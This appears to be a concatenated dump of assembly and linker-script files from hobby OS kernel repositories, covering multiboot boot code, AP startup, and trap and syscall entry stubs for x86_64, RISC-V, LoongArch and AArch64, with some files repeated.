# clear segment selectors
xor ax, ax
mov ss, ax
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
.endm
.code32
bsp_entry32:
lgdt [.Ltmp_gdt_desc - {offset}] # load the temporary GDT
ENTRY32_COMMON
ljmp 0x10, offset bsp_entry64 - {offset} # 0x10 is code64 segment
.code32
.global ap_entry32
ap_entry32:
ENTRY32_COMMON
ljmp 0x10, offset ap_entry64 - {offset} # 0x10 is code64 segment
.code64
bsp_entry64:
ENTRY64_COMMON
# set RSP to boot stack
movabs rsp, offset {boot_stack}
add rsp, {boot_stack_size}
# call rust_entry(magic, mbi)
movabs rax, offset {entry}
call rax
jmp .Lhlt
.code64
ap_entry64:
ENTRY64_COMMON
# set RSP to high address (already set in ap_start.S)
mov rax, {offset}
add rsp, rax
# call rust_entry_secondary(magic)
mov rdi, {mb_magic}
movabs rax, offset {entry_secondary}
call rax
jmp .Lhlt
.Lhlt:
hlt
jmp .Lhlt
.section .rodata
.balign 8
.Ltmp_gdt_desc:
.short .Ltmp_gdt_end - .Ltmp_gdt - 1 # limit
.long .Ltmp_gdt - {offset} # base
.section .data
.balign 16
.Ltmp_gdt:
.quad 0x0000000000000000 # 0x00: null
.quad 0x00cf9b000000ffff # 0x08: code segment (base=0, limit=0xfffff, type=32bit code exec/read, DPL=0, 4k)
.quad 0x00af9b000000ffff # 0x10: code segment (base=0, limit=0xfffff, type=64bit code exec/read, DPL=0, 4k)
.quad 0x00cf93000000ffff # 0x18: data segment (base=0, limit=0xfffff, type=32bit data read/write, DPL=0, 4k)
.Ltmp_gdt_end:
.balign 4096
.Ltmp_pml4:
# 0x0000_0000 ~ 0xffff_ffff
.quad .Ltmp_pdpt_low - {offset} + 0x3 # PRESENT | WRITABLE | paddr(tmp_pdpt)
.zero 8 * 255
# 0xffff_8000_0000_0000 ~ 0xffff_8000_ffff_ffff
.quad .Ltmp_pdpt_high - {offset} + 0x3 # PRESENT | WRITABLE | paddr(tmp_pdpt)
.zero 8 * 255
# FIXME: may not work on macOS using hvf as the CPU does not support 1GB page (pdpe1gb)
.Ltmp_pdpt_low:
.quad 0x0000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x0)
.quad 0x40000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x4000_0000)
.quad 0x80000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x8000_0000)
.quad 0xc0000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0xc000_0000)
.zero 8 * 508
.Ltmp_pdpt_high:
.quad 0x0000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x0)
.quad 0x40000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x4000_0000)
.quad 0x80000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x8000_0000)
.quad 0xc0000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0xc000_0000)
.zero 8 * 508
|
MukioXun/OSKernel_test | 1,965 | AstrancE/modules/axhal/src/platform/x86_pc/ap_start.S | # Boot application processors into the protected mode.
# Each non-boot CPU ("AP") is started up in response to a STARTUP
# IPI from the boot CPU. Section B.4.2 of the Multi-Processor
# Specification says that the AP will start in real mode with CS:IP
# set to XY00:0000, where XY is an 8-bit value sent with the
# STARTUP. Thus this code must start at a 4096-byte boundary.
#
# Because this code sets DS to zero, it must sit
# at an address in the low 2^16 bytes.
.equ pa_ap_start32, ap_start32 - ap_start + {start_page_paddr}
.equ pa_ap_gdt, .Lap_tmp_gdt - ap_start + {start_page_paddr}
.equ pa_ap_gdt_desc, .Lap_tmp_gdt_desc - ap_start + {start_page_paddr}
.equ stack_ptr, {start_page_paddr} + 0xff0
.equ entry_ptr, {start_page_paddr} + 0xff8
# 0x6000
.section .text
.code16
.p2align 12
.global ap_start
ap_start:
cli
wbinvd
xor ax, ax
mov ds, ax
mov es, ax
mov ss, ax
mov fs, ax
mov gs, ax
# load the 64-bit GDT
lgdt [pa_ap_gdt_desc]
# switch to protected-mode
mov eax, cr0
or eax, (1 << 0)
mov cr0, eax
# far jump to 32-bit code. 0x8 is code32 segment selector
ljmp 0x8, offset pa_ap_start32
.code32
ap_start32:
mov esp, [stack_ptr]
mov eax, [entry_ptr]
jmp eax
.balign 8
# .type multiboot_header, STT_OBJECT
.Lap_tmp_gdt_desc:
.short .Lap_tmp_gdt_end - .Lap_tmp_gdt - 1 # limit
.long pa_ap_gdt # base
.balign 16
.Lap_tmp_gdt:
.quad 0x0000000000000000 # 0x00: null
.quad 0x00cf9b000000ffff # 0x08: code segment (base=0, limit=0xfffff, type=32bit code exec/read, DPL=0, 4k)
.quad 0x00af9b000000ffff # 0x10: code segment (base=0, limit=0xfffff, type=64bit code exec/read, DPL=0, 4k)
.quad 0x00cf93000000ffff # 0x18: data segment (base=0, limit=0xfffff, type=32bit data read/write, DPL=0, 4k)
.Lap_tmp_gdt_end:
# 0x7000
.p2align 12
.global ap_end
ap_end:
|
MukioXun/OSKernel_test | 1,791 | AstrancE/modules/axhal/src/arch/loongarch64/trap.S | .macro SAVE_REGS, from_user
move $t0, $sp
.if \from_user == 1
csrrd $sp, KSAVE_KSP // restore kernel sp
addi.d $sp, $sp, -{trapframe_size}
STD $tp, $sp, 2
STD $r21, $sp, 21
csrrd $tp, KSAVE_TP
csrrd $r21, KSAVE_R21
.else
addi.d $sp, $sp, -{trapframe_size}
.endif
STD $t0, $sp, 3
csrrd $t0, KSAVE_TEMP
PUSH_GENERAL_REGS
csrrd $t1, LA_CSR_PRMD
csrrd $t2, LA_CSR_ERA
STD $t1, $sp, 32 // prmd
STD $t2, $sp, 33 // era
.endm
.macro RESTORE_REGS, from_user
.if \from_user == 1
csrwr $tp, KSAVE_TP
csrwr $r21, KSAVE_R21
LDD $tp, $sp, 2
LDD $r21, $sp, 21
addi.d $t1, $sp, {trapframe_size}
csrwr $t1, KSAVE_KSP // save kernel sp
.endif
LDD $t1, $sp, 33 // era
LDD $t2, $sp, 32 // prmd
csrwr $t1, LA_CSR_ERA
csrwr $t2, LA_CSR_PRMD
POP_GENERAL_REGS
LDD $sp, $sp, 3
.endm
.section .text
.balign 4096
.global exception_entry_base
exception_entry_base:
csrwr $t0, KSAVE_TEMP
csrrd $t0, LA_CSR_PRMD
andi $t0, $t0, 0x3
bnez $t0, .Lfrom_userspace
.Lfrom_kernel:
SAVE_REGS 0
move $a0, $sp
addi.d $a1, $zero, 0
bl loongarch64_trap_handler
RESTORE_REGS 0
ertn
.Lfrom_userspace:
SAVE_REGS 1
move $a0, $sp
addi.d $a1, $zero, 1
bl loongarch64_trap_handler
RESTORE_REGS 1
ertn
.section .text
.balign 4096
.global handle_tlb_refill
handle_tlb_refill:
csrwr $t0, LA_CSR_TLBRSAVE
csrrd $t0, LA_CSR_PGD
lddir $t0, $t0, 3
lddir $t0, $t0, 2
lddir $t0, $t0, 1
ldpte $t0, 0
ldpte $t0, 1
tlbfill
csrrd $t0, LA_CSR_TLBRSAVE
ertn
|
MukioXun/OSKernel_test | 2,358 | AstrancE/modules/axhal/src/arch/riscv/trap.S | .macro SAVE_REGS, from_user
addi sp, sp, -{trapframe_size}
PUSH_GENERAL_REGS
csrr t0, sepc
csrr t1, sstatus
csrrw t2, sscratch, zero // save sscratch (sp) and zero it
STR t0, sp, 31 // tf.sepc
STR t1, sp, 32 // tf.sstatus
STR t2, sp, 1 // tf.regs.sp
.if \from_user == 1
LDR t0, sp, 2 // load supervisor gp
LDR t1, sp, 3 // load supervisor tp
STR gp, sp, 2 // save user gp and tp
STR tp, sp, 3
mv gp, t0
mv tp, t1
.endif
.endm
.macro RESTORE_REGS, from_user
.if \from_user == 1
LDR t1, sp, 2 // load user gp and tp
LDR t0, sp, 3
STR gp, sp, 2 // save supervisor gp
STR tp, sp, 3 // save supervisor gp and tp
mv gp, t1
mv tp, t0
addi t0, sp, {trapframe_size} // put supervisor sp to scratch
csrw sscratch, t0
.endif
// restore sepc
LDR t0, sp, 31
csrw sepc, t0
// restore sstatus, but don't change FS
LDR t0, sp, 32 // t0 = sstatus to restore
csrr t1, sstatus // t1 = current sstatus
li t2, 0x6000 // t2 = mask for FS
and t1, t1, t2 // t1 = current FS
not t2, t2 // t2 = ~(mask for FS)
and t0, t0, t2 // t0 = sstatus to restore(cleared FS)
or t0, t0, t1 // t0 = sstatus to restore with current FS
csrw sstatus, t0 // restore sstatus
POP_GENERAL_REGS
LDR sp, sp, 1 // load sp from tf.regs.sp
.endm
.section .text
.balign 4
.global trap_vector_base
trap_vector_base:
// sscratch == 0: trap from S mode
// sscratch != 0: trap from U mode
csrrw sp, sscratch, sp // swap sscratch and sp
bnez sp, .Ltrap_entry_u
csrr sp, sscratch // put supervisor sp back
j .Ltrap_entry_s
.Ltrap_entry_s:
SAVE_REGS 0
mv a0, sp
li a1, 0
call riscv_trap_handler
RESTORE_REGS 0
sret
.Ltrap_entry_u:
SAVE_REGS 1
mv a0, sp
li a1, 1
call riscv_trap_handler
RESTORE_REGS 1
sret
|
MukioXun/OSKernel_test | 1,397 | AstrancE/modules/axhal/src/arch/x86_64/syscall.S | .section .text
.code64
syscall_entry:
swapgs // switch to kernel gs
mov gs:[offset __PERCPU_USER_RSP_OFFSET], rsp // save user rsp
mov rsp, gs:[offset __PERCPU_TSS + {tss_rsp0_offset}] // switch to kernel stack
sub rsp, 8 // skip user ss
push gs:[offset __PERCPU_USER_RSP_OFFSET] // user rsp
push r11 // rflags
push {ucode64} // cs
push rcx // rip
sub rsp, 4 * 8 // skip until general registers
push r15
push r14
push r13
push r12
push r11
push r10
push r9
push r8
push rdi
push rsi
push rbp
push rbx
push rdx
push rcx
push rax
mov rdi, rsp
call x86_syscall_handler
pop rax
pop rcx
pop rdx
pop rbx
pop rbp
pop rsi
pop rdi
pop r8
pop r9
pop r10
pop r11
pop r12
pop r13
pop r14
pop r15
add rsp, 9 * 8
mov rcx, [rsp - 5 * 8] // rip
mov r11, [rsp - 3 * 8] // rflags
mov rsp, [rsp - 2 * 8] // user rsp
swapgs
sysretq
|
MukioXun/OSKernel_test | 1,627 | AstrancE/modules/axhal/src/arch/x86_64/trap.S | .equ NUM_INT, 256
.altmacro
.macro DEF_HANDLER, i
.Ltrap_handler_\i:
.if \i == 8 || (\i >= 10 && \i <= 14) || \i == 17
# error code pushed by CPU
push \i # interrupt vector
jmp .Ltrap_common
.else
push 0 # fill in error code in TrapFrame
push \i # interrupt vector
jmp .Ltrap_common
.endif
.endm
.macro DEF_TABLE_ENTRY, i
.quad .Ltrap_handler_\i
.endm
.section .text
.code64
_trap_handlers:
.set i, 0
.rept NUM_INT
DEF_HANDLER %i
.set i, i + 1
.endr
.Ltrap_common:
test byte ptr [rsp + 3 * 8], 3 # swap GS if it comes from user space
jz 1f
swapgs
1:
sub rsp, 16 # reserve space for fs_base
push r15
push r14
push r13
push r12
push r11
push r10
push r9
push r8
push rdi
push rsi
push rbp
push rbx
push rdx
push rcx
push rax
mov rdi, rsp
call x86_trap_handler
pop rax
pop rcx
pop rdx
pop rbx
pop rbp
pop rsi
pop rdi
pop r8
pop r9
pop r10
pop r11
pop r12
pop r13
pop r14
pop r15
add rsp, 16 # pop fs_base
test byte ptr [rsp + 3 * 8], 3 # swap GS back if return to user space
jz 2f
swapgs
2:
add rsp, 16 # pop vector, error_code
iretq
.section .rodata
.global trap_handler_table
trap_handler_table:
.set i, 0
.rept NUM_INT
DEF_TABLE_ENTRY %i
.set i, i + 1
.endr
|
MukioXun/OSKernel_test | 2,989 | AstrancE/modules/axhal/src/arch/aarch64/trap.S | .macro SAVE_REGS
sub sp, sp, {trapframe_size}
stp x0, x1, [sp]
stp x2, x3, [sp, 2 * 8]
stp x4, x5, [sp, 4 * 8]
stp x6, x7, [sp, 6 * 8]
stp x8, x9, [sp, 8 * 8]
stp x10, x11, [sp, 10 * 8]
stp x12, x13, [sp, 12 * 8]
stp x14, x15, [sp, 14 * 8]
stp x16, x17, [sp, 16 * 8]
stp x18, x19, [sp, 18 * 8]
stp x20, x21, [sp, 20 * 8]
stp x22, x23, [sp, 22 * 8]
stp x24, x25, [sp, 24 * 8]
stp x26, x27, [sp, 26 * 8]
stp x28, x29, [sp, 28 * 8]
str x30, [sp, 30 * 8]
mrs x9, sp_el0
mrs x10, tpidr_el0
mrs x11, elr_el1
mrs x12, spsr_el1
stp x9, x10, [sp, 31 * 8]
stp x11, x12, [sp, 33 * 8]
# restore kernel tpidr_el0
mrs x1, tpidrro_el0
msr tpidr_el0, x1
# We may have interrupted userspace, or a guest, or exit-from or
# return-to either of those. So we can't trust sp_el0, and need to
# restore it.
bl {cache_current_task_ptr}
.endm
.macro RESTORE_REGS
# backup kernel tpidr_el0
mrs x1, tpidr_el0
msr tpidrro_el0, x1
ldp x11, x12, [sp, 33 * 8]
ldp x9, x10, [sp, 31 * 8]
msr sp_el0, x9
msr tpidr_el0, x10
msr elr_el1, x11
msr spsr_el1, x12
ldr x30, [sp, 30 * 8]
ldp x28, x29, [sp, 28 * 8]
ldp x26, x27, [sp, 26 * 8]
ldp x24, x25, [sp, 24 * 8]
ldp x22, x23, [sp, 22 * 8]
ldp x20, x21, [sp, 20 * 8]
ldp x18, x19, [sp, 18 * 8]
ldp x16, x17, [sp, 16 * 8]
ldp x14, x15, [sp, 14 * 8]
ldp x12, x13, [sp, 12 * 8]
ldp x10, x11, [sp, 10 * 8]
ldp x8, x9, [sp, 8 * 8]
ldp x6, x7, [sp, 6 * 8]
ldp x4, x5, [sp, 4 * 8]
ldp x2, x3, [sp, 2 * 8]
ldp x0, x1, [sp]
add sp, sp, {trapframe_size}
.endm
.macro INVALID_EXCP, kind, source
.p2align 7
SAVE_REGS
mov x0, sp
mov x1, \kind
mov x2, \source
bl invalid_exception
b .Lexception_return
.endm
.macro HANDLE_SYNC, source
.p2align 7
SAVE_REGS
mov x0, sp
mov x1, \source
bl handle_sync_exception
b .Lexception_return
.endm
.macro HANDLE_IRQ, source
.p2align 7
SAVE_REGS
mov x0, sp
mov x1, \source
bl handle_irq_exception
b .Lexception_return
.endm
.section .text
.p2align 11
.global exception_vector_base
exception_vector_base:
// current EL, with SP_EL0
INVALID_EXCP 0 0
INVALID_EXCP 1 0
INVALID_EXCP 2 0
INVALID_EXCP 3 0
// current EL, with SP_ELx
HANDLE_SYNC 1
HANDLE_IRQ 1
INVALID_EXCP 2 1
INVALID_EXCP 3 1
// lower EL, aarch64
HANDLE_SYNC 2
HANDLE_IRQ 2
INVALID_EXCP 2 2
INVALID_EXCP 3 2
// lower EL, aarch32
INVALID_EXCP 0 3
INVALID_EXCP 1 3
INVALID_EXCP 2 3
INVALID_EXCP 3 3
.Lexception_return:
RESTORE_REGS
eret
|
MusicalArtist12/basic-os-rust | 2,287 | src/kernel/boot/init.s | .global start
.section .init, "ax", @progbits
.code32
.extern stack_top
start:
cli
mov %ebx, %edi // pass multiboot address information to _start
movl $stack_top, %esp
call check_multiboot
call check_cpuid
call check_longmode
call setup_page_tables
call enable_paging
lgdt (gdt64_pointer)
movw $gdt64_data_offset, %ax
movw %ax, %ds
movw %ax, %es
movw %ax, %fs
movw %ax, %gs
movw %ax, %ss
ljmp $gdt64_code_offset, $fix_cs
fix_cs:
jmp _start
hlt
check_multiboot:
cmp $0x36d76289, %eax
jne multiboot_fail
ret
check_cpuid:
pushfd
pop %eax
// make a copy and store into %ecx
mov %eax, %ecx
xor $1 << 21, %eax
push %eax
popfd
pushfd
pop %eax
push %ecx
popfd
xor %eax, %ecx
jz cpuid_fail // jump if eax == ecx
ret
check_longmode:
mov 0x80000000, %eax
cpuid
cmp 0x80000001, %eax
jb longmode_fail // jump if eax < ecx
ret
setup_page_tables:
movl $p3_table, %eax
or $0b11, %eax
movl %eax, (p4_table)
movl $p2_table, %eax
or $0b11, %eax
movl %eax, (p3_table)
movl $0, %ecx
.map_p2_table:
movl $0x200000, %eax
mul %ecx
orl $0b10000011, %eax
movl %eax, p2_table(,%ecx, 8)
inc %ecx
cmp $512, %ecx
jne .map_p2_table
movl $p4_table, %eax
or $0b11, %eax
// movl %eax, p4_table + 511 * 8
movl %eax, [p4_table + 511 * 8]
ret
enable_paging:
movl $p4_table, %eax
movl %eax, %cr3
movl %cr4, %eax
orl $1 << 5, %eax
mov %eax, %cr4
mov $0xC0000080, %ecx
rdmsr
orl $1 << 8, %eax
wrmsr
movl %cr0, %eax
orl $1 << 31, %eax
mov %eax, %cr0
ret
.equ vga_start, 0xb8000
cpuid_fail:
movl $0x4f504f43, vga_start
movl $0x4f494f55, vga_start + 4
movl $0x00004f44, vga_start + 8
hlt
longmode_fail:
movl $0x4f4f4f4c, vga_start
movl $0x4f474f4e, vga_start + 4
movl $0x4f444f4d, vga_start + 8
hlt
multiboot_fail:
movl $0x4f554f4d, vga_start
movl $0x4f544f4c, vga_start + 4
movl $0x4f424f49, vga_start + 8
movl $0x4f4f4f4f, vga_start + 12
movl $0x4f0a4f54, vga_start + 16
hlt
|
MukioXun/OSKernel_test | 2,386 | AstrancE/modules/axhal/linker.lds.S | OUTPUT_ARCH(%ARCH%)
BASE_ADDRESS = %KERNEL_BASE%;
ENTRY(_start)
SECTIONS
{
. = BASE_ADDRESS;
_skernel = .;
.text : ALIGN(4K) {
_stext = .;
*(.text.boot)
*(.text .text.*)
. = ALIGN(4K);
_etext = .;
}
_srodata = .;
.rodata : ALIGN(4K) {
*(.rodata .rodata.*)
*(.srodata .srodata.*)
*(.sdata2 .sdata2.*)
}
.init_array : ALIGN(0x10) {
__init_array_start = .;
*(.init_array .init_array.*)
__init_array_end = .;
}
. = ALIGN(4K);
_erodata = .;
.trampoline : ALIGN(4K) {
_strampoline = .;
*(.trampoline.*)
. = ALIGN(4K);
_etrampoline = .;
}
.data : ALIGN(4K) {
_sdata = .;
*(.data.boot_page_table)
. = ALIGN(4K);
*(.data .data.*)
*(.sdata .sdata.*)
*(.got .got.*)
}
.tdata : ALIGN(0x10) {
_stdata = .;
*(.tdata .tdata.*)
_etdata = .;
}
.tbss : ALIGN(0x10) {
_stbss = .;
*(.tbss .tbss.*)
*(.tcommon)
_etbss = .;
}
. = ALIGN(4K);
_percpu_start = .;
_percpu_end = _percpu_start + SIZEOF(.percpu);
.percpu 0x0 : AT(_percpu_start) {
_percpu_load_start = .;
*(.percpu .percpu.*)
_percpu_load_end = .;
. = _percpu_load_start + ALIGN(64) * (%SMP% + 1); // add 1 since CPU hartid starts from 1
}
. = _percpu_end;
. = ALIGN(4K);
_edata = .;
.bss : AT(.) ALIGN(4K) {
boot_stack = .;
*(.bss.stack)
. = ALIGN(4K);
boot_stack_top = .;
_sbss = .;
*(.bss .bss.*)
*(.sbss .sbss.*)
*(COMMON)
. = ALIGN(4K);
_ebss = .;
}
_ekernel = .;
/DISCARD/ : {
*(.comment) *(.gnu*) *(.note*) *(.eh_frame*)
}
}
SECTIONS {
linkme_IRQ : { *(linkme_IRQ) }
linkm2_IRQ : { *(linkm2_IRQ) }
linkme_PAGE_FAULT : { *(linkme_PAGE_FAULT) }
linkm2_PAGE_FAULT : { *(linkm2_PAGE_FAULT) }
linkme_SYSCALL : { *(linkme_SYSCALL) }
linkm2_SYSCALL : { *(linkm2_SYSCALL) }
linkme_PRE_TRAP : { *(linkme_PRE_TRAP) }
linkm2_PRE_TRAP : { *(linkm2_PRE_TRAP) }
linkme_POST_TRAP : { *(linkme_POST_TRAP) }
linkm2_POST_TRAP : { *(linkm2_POST_TRAP) }
axns_resource : { *(axns_resource) }
}
INSERT AFTER .tbss;
|
MukioXun/OSKernel_test | 4,325 | AstrancE/modules/axhal/src/platform/x86_pc/multiboot.S | # Bootstrapping from 32-bit with the Multiboot specification.
# See https://www.gnu.org/software/grub/manual/multiboot/multiboot.html
.section .text.boot
.code32
.global _start
_start:
mov edi, eax # arg1: magic: 0x2BADB002
mov esi, ebx # arg2: multiboot info
jmp bsp_entry32
.balign 4
.type multiboot_header, STT_OBJECT
multiboot_header:
.int {mb_hdr_magic} # magic: 0x1BADB002
.int {mb_hdr_flags} # flags
.int -({mb_hdr_magic} + {mb_hdr_flags}) # checksum
.int multiboot_header - {offset} # header_addr
.int _skernel - {offset} # load_addr
.int _edata - {offset} # load_end
.int _ebss - {offset} # bss_end_addr
.int _start - {offset} # entry_addr
# Common code in 32-bit, prepare states to enter 64-bit.
.macro ENTRY32_COMMON
# set data segment selectors
mov ax, 0x18
mov ss, ax
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
# set PAE, PGE bit in CR4
mov eax, {cr4}
mov cr4, eax
# load the temporary page table
lea eax, [.Ltmp_pml4 - {offset}]
mov cr3, eax
# set LME, NXE bit in IA32_EFER
mov ecx, {efer_msr}
mov edx, 0
mov eax, {efer}
wrmsr
# set protected mode, write protect, paging bit in CR0
mov eax, {cr0}
mov cr0, eax
.endm
# Common code in 64-bit
.macro ENTRY64_COMMON
# clear segment selectors
xor ax, ax
mov ss, ax
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
.endm
.code32
bsp_entry32:
lgdt [.Ltmp_gdt_desc - {offset}] # load the temporary GDT
ENTRY32_COMMON
ljmp 0x10, offset bsp_entry64 - {offset} # 0x10 is code64 segment
.code32
.global ap_entry32
ap_entry32:
ENTRY32_COMMON
ljmp 0x10, offset ap_entry64 - {offset} # 0x10 is code64 segment
.code64
bsp_entry64:
ENTRY64_COMMON
# set RSP to boot stack
movabs rsp, offset {boot_stack}
add rsp, {boot_stack_size}
# call rust_entry(magic, mbi)
movabs rax, offset {entry}
call rax
jmp .Lhlt
.code64
ap_entry64:
ENTRY64_COMMON
# set RSP to high address (already set in ap_start.S)
mov rax, {offset}
add rsp, rax
# call rust_entry_secondary(magic)
mov rdi, {mb_magic}
movabs rax, offset {entry_secondary}
call rax
jmp .Lhlt
.Lhlt:
hlt
jmp .Lhlt
.section .rodata
.balign 8
.Ltmp_gdt_desc:
.short .Ltmp_gdt_end - .Ltmp_gdt - 1 # limit
.long .Ltmp_gdt - {offset} # base
.section .data
.balign 16
.Ltmp_gdt:
.quad 0x0000000000000000 # 0x00: null
.quad 0x00cf9b000000ffff # 0x08: code segment (base=0, limit=0xfffff, type=32bit code exec/read, DPL=0, 4k)
.quad 0x00af9b000000ffff # 0x10: code segment (base=0, limit=0xfffff, type=64bit code exec/read, DPL=0, 4k)
.quad 0x00cf93000000ffff # 0x18: data segment (base=0, limit=0xfffff, type=32bit data read/write, DPL=0, 4k)
.Ltmp_gdt_end:
.balign 4096
.Ltmp_pml4:
# 0x0000_0000 ~ 0xffff_ffff
.quad .Ltmp_pdpt_low - {offset} + 0x3 # PRESENT | WRITABLE | paddr(tmp_pdpt)
.zero 8 * 255
# 0xffff_8000_0000_0000 ~ 0xffff_8000_ffff_ffff
.quad .Ltmp_pdpt_high - {offset} + 0x3 # PRESENT | WRITABLE | paddr(tmp_pdpt)
.zero 8 * 255
# FIXME: may not work on macOS using hvf as the CPU does not support 1GB page (pdpe1gb)
.Ltmp_pdpt_low:
.quad 0x0000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x0)
.quad 0x40000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x4000_0000)
.quad 0x80000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x8000_0000)
.quad 0xc0000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0xc000_0000)
.zero 8 * 508
.Ltmp_pdpt_high:
.quad 0x0000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x0)
.quad 0x40000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x4000_0000)
.quad 0x80000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x8000_0000)
.quad 0xc0000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0xc000_0000)
.zero 8 * 508
|
MukioXun/OSKernel_test | 1,965 | AstrancE/modules/axhal/src/platform/x86_pc/ap_start.S | # Boot application processors into the protected mode.
# Each non-boot CPU ("AP") is started up in response to a STARTUP
# IPI from the boot CPU. Section B.4.2 of the Multi-Processor
# Specification says that the AP will start in real mode with CS:IP
# set to XY00:0000, where XY is an 8-bit value sent with the
# STARTUP. Thus this code must start at a 4096-byte boundary.
#
# Because this code sets DS to zero, it must sit
# at an address in the low 2^16 bytes.
.equ pa_ap_start32, ap_start32 - ap_start + {start_page_paddr}
.equ pa_ap_gdt, .Lap_tmp_gdt - ap_start + {start_page_paddr}
.equ pa_ap_gdt_desc, .Lap_tmp_gdt_desc - ap_start + {start_page_paddr}
.equ stack_ptr, {start_page_paddr} + 0xff0
.equ entry_ptr, {start_page_paddr} + 0xff8
# 0x6000
.section .text
.code16
.p2align 12
.global ap_start
ap_start:
cli
wbinvd
xor ax, ax
mov ds, ax
mov es, ax
mov ss, ax
mov fs, ax
mov gs, ax
# load the 64-bit GDT
lgdt [pa_ap_gdt_desc]
# switch to protected-mode
mov eax, cr0
or eax, (1 << 0)
mov cr0, eax
# far jump to 32-bit code. 0x8 is code32 segment selector
ljmp 0x8, offset pa_ap_start32
.code32
ap_start32:
mov esp, [stack_ptr]
mov eax, [entry_ptr]
jmp eax
.balign 8
# .type multiboot_header, STT_OBJECT
.Lap_tmp_gdt_desc:
.short .Lap_tmp_gdt_end - .Lap_tmp_gdt - 1 # limit
.long pa_ap_gdt # base
.balign 16
.Lap_tmp_gdt:
.quad 0x0000000000000000 # 0x00: null
.quad 0x00cf9b000000ffff # 0x08: code segment (base=0, limit=0xfffff, type=32bit code exec/read, DPL=0, 4k)
.quad 0x00af9b000000ffff # 0x10: code segment (base=0, limit=0xfffff, type=64bit code exec/read, DPL=0, 4k)
.quad 0x00cf93000000ffff # 0x18: data segment (base=0, limit=0xfffff, type=32bit data read/write, DPL=0, 4k)
.Lap_tmp_gdt_end:
# 0x7000
.p2align 12
.global ap_end
ap_end:
|
MukioXun/OSKernel_test | 1,791 | AstrancE/modules/axhal/src/arch/loongarch64/trap.S | .macro SAVE_REGS, from_user
move $t0, $sp
.if \from_user == 1
csrrd $sp, KSAVE_KSP // restore kernel sp
addi.d $sp, $sp, -{trapframe_size}
STD $tp, $sp, 2
STD $r21, $sp, 21
csrrd $tp, KSAVE_TP
csrrd $r21, KSAVE_R21
.else
addi.d $sp, $sp, -{trapframe_size}
.endif
STD $t0, $sp, 3
csrrd $t0, KSAVE_TEMP
PUSH_GENERAL_REGS
csrrd $t1, LA_CSR_PRMD
csrrd $t2, LA_CSR_ERA
STD $t1, $sp, 32 // prmd
STD $t2, $sp, 33 // era
.endm
.macro RESTORE_REGS, from_user
.if \from_user == 1
csrwr $tp, KSAVE_TP
csrwr $r21, KSAVE_R21
LDD $tp, $sp, 2
LDD $r21, $sp, 21
addi.d $t1, $sp, {trapframe_size}
csrwr $t1, KSAVE_KSP // save kernel sp
.endif
LDD $t1, $sp, 33 // era
LDD $t2, $sp, 32 // prmd
csrwr $t1, LA_CSR_ERA
csrwr $t2, LA_CSR_PRMD
POP_GENERAL_REGS
LDD $sp, $sp, 3
.endm
.section .text
.balign 4096
.global exception_entry_base
exception_entry_base:
csrwr $t0, KSAVE_TEMP
csrrd $t0, LA_CSR_PRMD
andi $t0, $t0, 0x3
bnez $t0, .Lfrom_userspace
.Lfrom_kernel:
SAVE_REGS 0
move $a0, $sp
addi.d $a1, $zero, 0
bl loongarch64_trap_handler
RESTORE_REGS 0
ertn
.Lfrom_userspace:
SAVE_REGS 1
move $a0, $sp
addi.d $a1, $zero, 1
bl loongarch64_trap_handler
RESTORE_REGS 1
ertn
.section .text
.balign 4096
.global handle_tlb_refill
handle_tlb_refill:
csrwr $t0, LA_CSR_TLBRSAVE
csrrd $t0, LA_CSR_PGD
lddir $t0, $t0, 3
lddir $t0, $t0, 2
lddir $t0, $t0, 1
ldpte $t0, 0
ldpte $t0, 1
tlbfill
csrrd $t0, LA_CSR_TLBRSAVE
ertn
|
MukioXun/OSKernel_test | 2,358 | AstrancE/modules/axhal/src/arch/riscv/trap.S | .macro SAVE_REGS, from_user
addi sp, sp, -{trapframe_size}
PUSH_GENERAL_REGS
csrr t0, sepc
csrr t1, sstatus
csrrw t2, sscratch, zero // save sscratch (sp) and zero it
STR t0, sp, 31 // tf.sepc
STR t1, sp, 32 // tf.sstatus
STR t2, sp, 1 // tf.regs.sp
.if \from_user == 1
LDR t0, sp, 2 // load supervisor gp
LDR t1, sp, 3 // load supervisor tp
STR gp, sp, 2 // save user gp and tp
STR tp, sp, 3
mv gp, t0
mv tp, t1
.endif
.endm
.macro RESTORE_REGS, from_user
.if \from_user == 1
LDR t1, sp, 2 // load user gp and tp
LDR t0, sp, 3
STR gp, sp, 2 // save supervisor gp
STR tp, sp, 3 // save supervisor gp and tp
mv gp, t1
mv tp, t0
addi t0, sp, {trapframe_size} // put supervisor sp to scratch
csrw sscratch, t0
.endif
// restore sepc
LDR t0, sp, 31
csrw sepc, t0
// restore sstatus, but don't change FS
LDR t0, sp, 32 // t0 = sstatus to restore
csrr t1, sstatus // t1 = current sstatus
li t2, 0x6000 // t2 = mask for FS
and t1, t1, t2 // t1 = current FS
not t2, t2 // t2 = ~(mask for FS)
and t0, t0, t2 // t0 = sstatus to restore(cleared FS)
or t0, t0, t1 // t0 = sstatus to restore with current FS
csrw sstatus, t0 // restore sstatus
POP_GENERAL_REGS
LDR sp, sp, 1 // load sp from tf.regs.sp
.endm
.section .text
.balign 4
.global trap_vector_base
trap_vector_base:
// sscratch == 0: trap from S mode
// sscratch != 0: trap from U mode
csrrw sp, sscratch, sp // swap sscratch and sp
bnez sp, .Ltrap_entry_u
csrr sp, sscratch // put supervisor sp back
